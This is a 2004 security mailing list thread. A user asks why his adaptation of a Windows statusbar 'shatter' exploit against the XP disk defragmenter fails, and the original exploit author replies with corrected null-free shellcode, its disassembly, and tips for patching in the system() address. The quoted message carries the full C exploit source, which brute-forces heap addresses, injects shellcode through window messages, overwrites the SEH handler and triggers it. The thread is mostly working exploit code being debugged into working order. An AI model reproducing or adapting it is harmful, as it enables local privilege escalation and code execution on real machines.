Hey,
> can anyone pls point me where i'm wrong ??
Sure
Original demo states
// Local No Null Cmd Shellcode.
This is because you can't send 0x00 with this statusbar exploit
Your shellcode contains nulls.
Try this code which is updated to use a system address of 0x77c28044
=
"\x90\x33\xc9\x66\xb9\x36\x32\xc1\xe1\x09\x66\xb9\x63\x6d\x51\x54\xbb\xe1\x1
2\x5e\x77\x03\xd9\xff\xd3\xcc\x90";
And remove your code that plugs the address into the shellcode.
Or you can be smart and keep your shellcode modification code but update it
so if
affects the shellcode correctly.
_exploit
00408030 90 nop
00408031 33 C9 xor ecx,ecx
00408033 66 B9 36 32 mov cx,3236h
00408037 C1 E1 09 shl ecx,9
0040803A 66 B9 63 6D mov cx,6D63h
0040803E 51 push ecx
0040803F 54 push esp
00408040 BB 5C 21 9D 77 mov ebx,775e125eh
00408045 03 D9 add ebx,ecx
00408047 FF D3 call ebx
00408049 CC int 3
So grab the address of system and subtract 0x646DE6 (cmd) then place into
the byte array.
or
Remove the add ebx,ecx bytes and just put the proc address straight in
or
write your own shellcode, pretty sure I did it this way because at the time
system had a
null in its address.
Either way, the code you sent works fine with that updated shellcode.
Be sure to grab my shatter presentation+code from the Blackhat site after
the conference if
this stuff interest you. It will contain previously unreleased information
and techniques.
Brett Moore
Network Intrusion Specialist, CTO
Security-Assessment.com Ltd
www.security-assessment.com
-----Original Message-----
From: bil_912 [mailto:bil_912_at_coolgoose.com]
Sent: Thursday, July 08, 2004 10:00 AM
To: vuln-dev_at_securityfocus.com
Subject: status-bar SHATTER attack
>
>
> hello all,
>
> recently i was playing with >> STATUS-BAR <<
shatter-attack-code provided
> by brett.moore_at_security-assessment.com
>
> the code with tiny modifications is attached here.
>
> the problem is ...
>
> xp.sp1 TOP SEH at 0x77ed73b4 was getting overwritten as 0x77ed74c0 where
my
> shellcode is residing.
>
> but even after that the code didnt get executed. i was attacking the
> "disk defragmenter" utility which come with windows XP.
>
> can anyone pls point me where i'm wrong ??
>
> thank u.
>
> [ i'm attaching a screen-shot of my desktop when attacking ]
>
>
//=========================================================================
>
/***************************************************************************
****
******
> * Statusbar Control Shatter exploit
> *
> * Demonstrates the use of a combination of windows messages to;
> * - brute force a useable heap address
> * - place structure information inside a process
> * - inject shellcode to known location
> * - overwrite 4 bytes of a critical memory address
> *
> * 4 Variables need to be set for proper execution.
> * - tWindow is the title of the programs main window
> * - sehHandler is the critical address to overwrite
> * - shellcodeaddr is the data space to inject the code
> * - heapaddr is the base heap address to start brute forcing
> *
> * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues
> * Try it out against any program with a progress bar
> *
>
****************************************************************************
****
*****/
>
> #include <windows.h>
> #include <commctrl.h>
> #include <stdio.h>
>
> // Local No Null Cmd Shellcode.
> BYTE exploit[]
="\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc";
>
> char g_classNameBuf[ 256 ];
> char tWindow[]="disk defragmenter";
>
> long sehHandler = 0x77ed73b4; // Critical Address To Overwrite
> long shellcodeaddr = 0x77ed74c0; // Known Writeable Space Or Global Space
> unsigned long heapaddr = 0x00100000; // Base Heap Address
> long mainhWnd;
>
> void doWrite(HWND hWnd, long tByte,long address);
> void BruteForceHeap(HWND hWnd);
> void IterateWindows(long hWnd);
>
> int main(int argc, char *argv[])
> {
>
> HMODULE hMod;
> DWORD ProcAddr;
> long x;
>
>
> //making the shellcode ready
> hMod = LoadLibrary("msvcrt.dll");
> ProcAddr = (DWORD)GetProcAddress(hMod, "system");
> if(ProcAddr != 0)
> *(long *)&exploit[8] = ProcAddr;
> //***************************
>
> //printf("+ Enter Window Title\n",tWindow);
> //flushall();
> //gets(tWindow);
>
>
>
> if (argc == 2)
> sscanf(argv[1],"%lx",&heapaddr);// Oddity
>
> printf("%% Using base heap address...0x%xh\n",heapaddr);
> printf("+ Finding %s Window...\n",tWindow);
> mainhWnd = (long)FindWindow(NULL,tWindow);
>
> if(mainhWnd == NULL)
> {
> printf("+ Couldn't Find %s Window\n",tWindow);
> return 0;
> }
> printf("+ Found Main Window At......0x%xh\n",mainhWnd);
> IterateWindows(mainhWnd);
> printf("+ Done...\n");
>
> return 0;
> }
>
>
> void IterateWindows(long hWnd)
> {
>
> long childhWnd,looper;
>
> childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
> while (childhWnd != NULL)
> {
> IterateWindows(childhWnd);
> childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
> }
>
> GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
> if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
> {
>
> // Find Heap Address
> BruteForceHeap((HWND) hWnd);
> //printf("+ Enter heapaddr : \n");
> //scanf("%lx",&heapaddr);
>
> // Inject shellcode to known address
> printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
> for (looper=0;looper<sizeof(exploit);looper++)
> doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
> // Overwrite SEH
> printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);
>
>
> doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);
>
>
>
> // Cause exception
> printf("+ Forcing Unhandled Exception\n");
> getch();
>
> SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1); //PROGRESSS_BAR
> SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);
>
> printf("+ Done...\n");
> exit(0);
> }
> }
>
> void BruteForceHeap(HWND hWnd, long tByte,long address)
> {
> long retval;
> BOOL foundHeap = FALSE;
> char buffer[5000];
> memset(buffer,0,sizeof(buffer));
>
> while (!foundHeap)
> {
> printf("+ Trying Heap Address.......0x%xh ",heapaddr);
>
> memset(buffer,0x58,sizeof(buffer)-1); // settin to X
>
> // Set Window Title
> SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
> // Set Part Contents
> SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
> retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
> printf("%d",retval);
>
> if(retval == 1)
> {
> // First Retval should be 1
> memset(buffer,0x80,sizeof(buffer)-1);
> // Set Window Title
> SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
> // Set Part Contents
> SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
> retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
> if(retval > 1)
> {
> // Second should be larger than 1
> printf(" : %d - Found Heap Address : 0x%x\n",retval,heapaddr);
> return(0);
> }
> }
> printf("\n");
> heapaddr += 2500;
> }
> }
>
>
> void doWrite(HWND hWnd, long tByte,long address)
> {
> char buffer[5000];
>
> memset(buffer,0,sizeof(buffer));
> memset(buffer,tByte,sizeof(buffer)-1);
> // Set Window Title
> SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
>
> // Set Statusbar width
> SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr);
> SendMessage( hWnd,(UINT) SB_GETPARTS,1,address);
>
> }
>
>
//=========================================================================
######################################################################
CONFIDENTIALITY NOTICE:
This message and any attachment(s) are confidential and proprietary.
They may also be privileged or otherwise protected from disclosure. If
you are not the intended recipient, advise the sender and delete this
message and any attachment from your system. If you are not the
intended recipient, you are not authorised to use or copy this message
or attachment or disclose the contents to any other person. Views
expressed are not necessarily endorsed by Security-Assessment.com
Limited. Please note that this communication does not designate an
information system for the purposes of the New Zealand Electronic
Transactions Act 2003.
######################################################################
Received on Jul 08 2004
Intro
